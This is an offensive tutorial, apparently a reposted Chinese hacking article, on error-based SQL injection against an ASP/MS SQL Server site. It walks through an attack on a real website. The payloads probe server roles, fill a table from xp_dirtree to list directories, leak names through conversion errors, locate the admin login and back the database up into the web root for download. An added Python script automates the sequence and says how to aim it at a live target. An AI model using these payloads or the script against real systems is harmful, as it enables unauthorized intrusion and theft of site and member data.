Weird SQL injection

xiaoxiao2021-03-06  14

SQL injection is where the real breakthroughs come from when you do something novel, something that turns two known pieces into one new trick; whoever has that one trick more than everyone else is the one who gets in. That is what SQL injection as a technique rests on. For a long time MS SQL Server has been a gift to us because of its powerful stored procedures. Today's injection techniques lean mainly on IIS error pages and SQL Server's own error messages: you use SELECT to build a statement that makes the server fail on purpose, and the error text then carries the information you want, such as table names and column names. Can you get more than that out of it? Yes, but it takes a trick. Let's take it apart step by step.

First open MS SQL Query Analyzer and enter:

xp_dirtree, execute permission: PUBLIC (every login can run it, not just sa)

Statement: exec master.dbo.xp_dirtree 'c:\'

It returns two columns, subdirectory and depth: subdirectory is a character (nvarchar) column, depth is an integer. See where this is going? Not yet? Keep reading.

Statement: CREATE TABLE DIRS (Paths varchar(100), ID int)

Purpose: everyone knows CREATE TABLE, but the table built here is the key to the whole thing. Its columns line up with the result set of xp_dirtree one for one, the same number of columns with compatible types, and that is what makes the next step possible. Here is the secret:

Statement: INSERT DIRS EXEC master.dbo.xp_dirtree 'c:\'

Purpose: looks odd? Is that INSERT even legal? Yes. INSERT ... EXEC inserts the result set of a stored procedure into a table, and it works as long as the table's columns match what the procedure returns. That is the difference from the ordinary INSERT ... VALUES form: you cannot put a stored procedure inside VALUES, but you can write INSERT table EXEC procedure, and every row the procedure returns lands in the table. (Size the column generously: subdirectory is nvarchar, and a name longer than the column fails the whole INSERT with a "string or binary data would be truncated" error.) Since we can write to a table, we can use any stored procedure that PUBLIC is allowed to execute to collect, step by step, the information we want.

Got it? If not, no matter; I have done this for real, and practice beats theory, so let's go live. The following test uses a real website as the target. Note: the connection does NOT have sa permission!

Statement: http://www.xxxxx.com/down/list.asp?id=1'

Returns: Microsoft OLE DB Provider for SQL Server error '80040e14'

Unclosed quotation mark before the character string ''.

/down/list.asp, line 21

Test which server roles the connection holds (is_srvrolemember returns 1 if the current login is in the role and 0 if not, so the page only renders normally for a role we actually hold):

Statement 1: http://www.xxxxx.com/down/list.asp?id=1 and 1=(select is_srvrolemember('sysadmin'))--

Statement 2: http://www.xxxxx.com/down/list.asp?id=1 and 1=(select is_srvrolemember('serveradmin'))--

Statement 3: http://www.xxxxx.com/down/list.asp?id=1 and 1=(select is_srvrolemember('setupadmin'))--

Statement 4: http://www.xxxxx.com/down/list.asp?id=1 and 1=(select is_srvrolemember('securityadmin'))--

Statement 5: http://www.xxxxx.com/down/list.asp?id=1 and 1=(select is_srvrolemember('diskadmin'))--

Statement 6: http://www.xxxxx.com/down/list.asp?id=1 and 1=(select is_srvrolemember('bulkadmin'))--

Statement 7: http://www.xxxxx.com/down/list.asp?id=1 and 1=(select is_member('db_owner'))--

In the actual test only the db_owner statement returns the page normally, so the connection's permission on the database is db_owner (owner of the down database). I skip the steps of dumping table names and column names; earlier issues of Hacker Defense covered them in detail, and anyone who wants them can look up "How do you want to play the query". Suppose we now have the administrators table and its columns. From here there are two ways forward: dump every field and take the backend user's password, where the hard part is finding the backend login path; or upload a webshell directly via BACKUP, where the hard part is finding the web directory.

Guessing the backend path by hand has a very low success rate; using xp_dirtree to get the information we want is simpler. This is the first time this has been written up, and many people may already be using it, but it works very well. Let's write the paths into a table!

Statement: http://www.xxxx.com/down/list.asp?id=1;CREATE TABLE DIRS (Paths varchar(100), ID int)--

Returns: the normal page. The table was created. Carry on!

Statement: http://www.xxxx.com/down/list.asp?id=1;INSERT DIRS EXEC master.dbo.xp_dirtree 'c:\'--

Returns: the normal page. Every directory on the C drive has now been written into the table. Cool! Next, read the table back, the brute-force way.

Statement: http://www.xxxx.com/down/list.asp?id=1 and 0<>(SELECT TOP 1 Paths FROM DIRS)--

Returns: Microsoft OLE DB Provider for SQL Server error '80040e07' Syntax error converting the varchar value '@ITPub' to a column of data type int.

So the directory names in the table can be read out through the conversion error, one row per request. Exclude what you have already seen to get the next one:

Statement: http://www.xxxx.com/down/list.asp?id=1 and 0<>(SELECT TOP 1 Paths FROM DIRS WHERE Paths NOT IN ('@ITPub'))--

Repeating the same method, we finally get the web directory: E:\Web. With the web directory known there are two options again: dig further for the backend login, or get a webshell directly via BACKUP. Since backup-to-webshell does not succeed that often, let's guess the backend instead. It is still xp_dirtree, but because xp_dirtree dumps the whole directory tree of a partition, the output is easy to get lost in, so we go one layer at a time and list the directories directly under E:\Web. (The ID column in DIRS is the depth xp_dirtree returns for each row, so a WHERE ID=1 filter on the existing table would give the same top-level names without a second table.)

Statement: http://www.xxxx.com/down/list.asp?id=1;CREATE TABLE DIRS1 (Paths varchar(100), ID int)--

Statement: http://www.xxxx.com/down/list.asp?id=1;INSERT DIRS1 EXEC master.dbo.xp_dirtree 'E:\Web'--

Statement: http://www.xxxx.com/down/list.asp?id=1 and 0<>(SELECT TOP 1 Paths FROM DIRS1)--
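The sequence above (create the helper table, fill it with INSERT ... EXEC xp_dirtree, then pull one name per request through the varchar-to-int conversion error) is the same for the C: round and for the E:\Web round, so here it is as one script. This is an added example, not code from the original post; it runs offline against a constructed stand-in for list.asp, and the stand-in, the sample directory tree and the table names are assumptions. It goes beyond the post in two small ways: it filters on the depth column (ID) that xp_dirtree already returns, so one table serves every level instead of a new table per layer, and it declares the path column as nvarchar(260) rather than varchar(100) so long or non-ASCII directory names do not fail the INSERT.

```python
import re
from urllib.parse import urlencode

# The conversion error the page leaks. First alternative is the SQL Server 2000 wording
# (error 245) seen in the article; the second is the 2005+ wording of the same error.
CONVERT_ERR = re.compile(
    r"converting the n?varchar value '(?P<val>[^']*)' to (?:a column of )?data type int", re.I)

NORMAL_PAGE = "<html>list.asp: normal output</html>"   # constructed stand-in for the real page


def sql_str(s):
    """T-SQL string literal: double any embedded single quote."""
    return "'" + s.replace("'", "''") + "'"


def create_payload(table):
    # nvarchar(260) rather than the page's varchar(100): subdirectory is nvarchar, and a name
    # longer than the column would fail the whole INSERT ... EXEC with a truncation error.
    return f"1;CREATE TABLE {table}(Paths nvarchar(260),ID int)--"


def fill_payload(table, path):
    return f"1;INSERT {table} EXEC master.dbo.xp_dirtree {sql_str(path)}--"


def next_payload(table, depth, seen):
    # Read one name per request: force the varchar-to-int conversion error on the first row
    # at this depth that we have not seen yet. ID is the depth column xp_dirtree returns.
    cond = f"ID={depth}"
    if seen:
        cond += " AND Paths NOT IN (" + ",".join(sql_str(s) for s in seen) + ")"
    return f"1 and 0<>(SELECT TOP 1 Paths FROM {table} WHERE {cond})--"


def drop_payload(table):
    return f"1;DROP TABLE {table}--"          # clean up the helper table afterwards


def inject_url(base, payload):
    """Full GET URL as the article shows it, e.g. base='http://www.xxxx.com/down/list.asp'."""
    return base + "?" + urlencode({"id": payload})


def harvest(send, table, path, depth=1, limit=500):
    """Create the helper table, fill it from xp_dirtree(path), then pull the names at `depth`
    one conversion error at a time. `send(payload)` must return the response body."""
    send(create_payload(table))
    send(fill_payload(table, path))
    seen = []
    while len(seen) < limit:
        m = CONVERT_ERR.search(send(next_payload(table, depth, seen)))
        if not m:                 # normal page: no rows left at this depth
            break
        seen.append(m.group("val"))
    send(drop_payload(table))
    return seen


# Constructed directory tree in xp_dirtree's output shape: (subdirectory, depth) rows, parent
# first, so xxxadminLogin is E:\Web\down\xxxadminLogin. Keys are lower-cased paths.
SAMPLE_TREE = {
    "e:\\web": [("down", 1), ("xxxadminLogin", 2), ("images", 1), ("inc", 1)],
}


def fake_target(tree):
    """Constructed stand-in for the vulnerable ASP page (no network). It understands only the
    payload shapes built above and leaks the conversion error the way the real page did."""
    tables = {}

    def send(payload):
        if m := re.match(r"1;CREATE TABLE (\w+)", payload):
            tables[m.group(1)] = []
        elif m := re.match(r"1;INSERT (\w+) EXEC master\.dbo\.xp_dirtree '([^']*)'", payload):
            tables[m.group(1)] = list(tree.get(m.group(2).lower(), []))
        elif m := re.match(r"1;DROP TABLE (\w+)", payload):
            tables.pop(m.group(1), None)
        elif m := re.match(r"1 and 0<>\(SELECT TOP 1 Paths FROM (\w+) WHERE ID=(\d+)"
                           r"(?: AND Paths NOT IN \((.*)\))?\)--", payload):
            seen = {s.replace("''", "'") for s in re.findall(r"'((?:[^']|'')*)'", m.group(3) or "")}
            rows = [n for n, d in tables.get(m.group(1), [])
                    if d == int(m.group(2)) and n not in seen]
            if rows:
                return ("Microsoft OLE DB Provider for SQL Server error '80040e07' Syntax error "
                        f"converting the varchar value '{rows[0]}' to a column of data type int.")
        return NORMAL_PAGE

    return send


def demo(depth=1):
    return harvest(fake_target(SAMPLE_TREE), "dirs", "E:\\Web", depth=depth)


if __name__ == "__main__":
    print(demo(1), demo(2))
```

Against a real target, replace fake_target with a function that fetches inject_url(base, payload) and returns the body. The NOT IN list grows by one literal per request, so on a long listing the GET line will eventually hit the IIS/browser query-string limit; when that happens, switch the condition to Paths>'last seen name' with ORDER BY Paths, which keeps every request the same size.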

After dumping the column row by row, a directory named xxxadminLogin finally comes out. Anyone can see this may be the backend directory we have been dreaming of! Calm down, we continue:

Statement: http://www.xxxxx.com/down/xxxadminLogin/

The login page comes up! Great, lucky! Username, password, login URL, what are you waiting for? Go in...

The xp_dirtree stored procedure returns only the directory tree, not files. If the login page sits directly in the web root there is nothing to be done, and in general the directory names you get back still have to be judged by hand, so finding the backend login through xp_dirtree depends heavily on experience and is a real test of one's thinking. (xp_dirtree does take two further, undocumented arguments, a depth limit and an include-files flag: exec master.dbo.xp_dirtree 'E:\Web',1,1 adds a third int column, file, and lists files as well, so a three-column table gets you file names that the two-column form cannot.)

Back to getting a webshell: either BACKUP an ASP trojan into the web directory, or back up the current database itself. Writing the trojan with one of the backup-based GetWebshell tools makes it easy, and to pick up the member data as well, backing up the whole database into the web directory is also a good way. Note that it is the SQL Server service account, not the web user, that writes the file, so it needs write access to E:\Web:

Statement: http://www.xxxx.com/down/list.asp?id=1;declare @a sysname;set @a=db_name();backup database @a to disk='E:\Web\down.bak';--

Now go and download it! Heh heh.

Please credit the original address when reposting: https://www.9cbs.com/read-49234.html
